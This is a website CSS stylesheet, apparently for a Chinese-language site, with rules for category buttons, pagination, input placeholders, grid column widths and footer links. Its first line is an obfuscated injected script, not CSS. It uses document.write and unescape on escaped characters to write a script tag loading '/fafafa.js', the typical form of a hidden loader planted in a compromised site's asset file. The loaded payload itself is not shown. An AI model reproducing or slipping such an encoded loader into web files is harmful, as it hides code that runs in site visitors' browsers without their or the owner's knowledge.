<script>document.write(unescape("%3Cscript%20src%3D%22\u002f\u0066\u0061\u0066\u0061\u0066\u0061\u002e\u006a\u0073%22%20type%3D%27text/javascript%27%3E%3C/script%3E"));</script>/*分类按钮*/
.moveBtn{
  background: #00479d !important;
  border-color: #00479d !important;
}
/*分类按钮结束*/
/*分类选中*/
.jpActive{
  background-color: #f5f8fa;
}
.jpActive .yjLink::before {
  opacity: 1 !important;
}
/*分类选中*/
/*翻页开始*/
.p_page .pageNum.active,
.p_page .pageNum:hover,
.p_page .next:hover,
.p_page .pre:hover,
.p_pagebox .next,
.p_pagebox .pre {
  background-color: #00479d !important;
  color: #fff;
  border-color: #00479d !important;
  border-radius: 0px;
}
.p_page .pageNum,
.p_page .pre,
.p_page .next {
  border-radius: 0px;
}
.p_pagebox .js_pageBtnDisable,
.p_pagebox .js_pageBtnDisable:hover,
.p_pagebox .js_pageBtnDisable:active {
  background: #f5f5f5 !important;
  border-color: #d9d9d9 !important;
  color: #bfbfbf !important;
}
/*翻页结束*/
/* 表格开始 */
input::-webkit-input-placeholder, textarea::-webkit-input-placeholder {
  color: #fefefe !important;
  font-size: 14px;
  font-family: MicrosoftYaHei;
}
input:-moz-placeholder, textarea:-moz-placeholder {
  color: #fefefe !important;
  font-size: 14px;
  font-family: MicrosoftYaHei;
}
input::-moz-placeholder, textarea::-moz-placeholder {
  color: #fefefe !important;
  font-size: 14px;
  font-family: MicrosoftYaHei;
}
input:-ms-input-placeholder, textarea:-ms-input-placeholder {
  color: #fefefe !important;
  font-size: 14px;
  font-family: MicrosoftYaHei;
}
/* 表格结束 */
/* Grid Start */
listCol_1 {
  display: inline-block;
  width: 10%;
}
listCol_2 {
  display: inline-block;
  width: 20%;
}
listCol_25 {
  display: inline-block;
  width: 25%;
}
listCol_3 {
  display: inline-block;
  width: 30%;
}
listCol_4 {
  display: inline-block;
  width: 40%;
}
listCol_5 {
  display: inline-block;
  width: 50%;
}
listCol_6 {
  display: inline-block;
  width: 60%;
}
listCol_7 {
  display: inline-block;
  width: 70%;
}
listCol_8 {
  display: inline-block;
  width: 80%;
}
listCol_9 {
  display: inline-block;
  width: 90%;
}
@media only screen and (max-width: 768px){
  div[class*=" listCol_"]{
    width: 100%;
  }
  span[style*="font-size:40px"]{
    font-size:28px !important;
  }
  span[style*="font-size:36px"]{
    font-size:26px !important;
  }
  .moveBtn{
    border-radius:0px !important;
  }
  #w_grid-1557553510028{
  	margin-top:72px !important;
  }
}
/* Grid End */
/*底部分类*/
.footerCate{
  font-size:0px;
  padding:0px;
  margin:0px;
}
.footerCateLink{
  display:inline-block;
  width:100%;
  max-width: 192px;
  overflow: hidden;
  white-space: nowrap;
  text-overflow: ellipsis;
  font-size:14px;
  color:#fff;
  line-height:36px;
  padding:0;
  transition: all 0.5s ease;
}
.footerCateLink:hover {
  color: #665cc7;
}
/*文本框a链接划过样式*/
.w_grid-000 .reset_style a{
  transition: all 0.5s ease;
}
.w_grid-000 .reset_style a:hover span{
  color: #01489d !important;
}
<!--0.0001518726348877-->